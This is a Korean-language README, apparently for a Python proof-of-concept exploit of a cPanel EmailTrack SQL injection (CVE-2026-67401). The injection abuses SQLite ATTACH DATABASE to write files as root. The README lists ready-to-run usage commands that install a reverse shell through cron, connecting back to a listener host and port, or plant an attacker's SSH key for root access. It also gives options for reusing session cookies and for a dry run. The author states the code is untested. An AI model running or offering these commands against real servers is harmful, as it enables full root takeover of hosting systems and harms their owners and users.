
Python 기반 CVE-2026-67401 개념 증명(PoC) — cPanel EmailTrack의 인증된 SQL 인젝션으로, SQLite ATTACH DATABASE를 통해 루트 권한으로 임의 파일 쓰기를 허용하여 리버스 셸 또는 SSH 키 삽입을 가능하게 합니다.
cPanel EmailTrack의 SQL 인젝션. 메일 권한이 있는 인증된 cPanel 사용자가 SQLite ATTACH DATABASE를 통해 루트 권한으로 임의 파일을 작성합니다. 루트 권한 획득까지 단 한 번의 요청만 필요합니다. 실제 대상에서 테스트하지 않았으며, 코드는 공개 정보와 기본적인 diff 비교만으로 작성되었습니다. 연구자로서 직접 검증하고 PR 수정 사항을 보내 주시기 바랍니다.
2026년 9월 8일 패치 이전의 모든 cPanel/WHM 빌드에 영향을 미칩니다.
requests 라이브러리# 크론을 통한 리버스 셸
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443
# SSH 키 등록
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub
# 기존 세션 사용
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1
# 드라이 런 (요청 출력만, 전송하지 않음)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1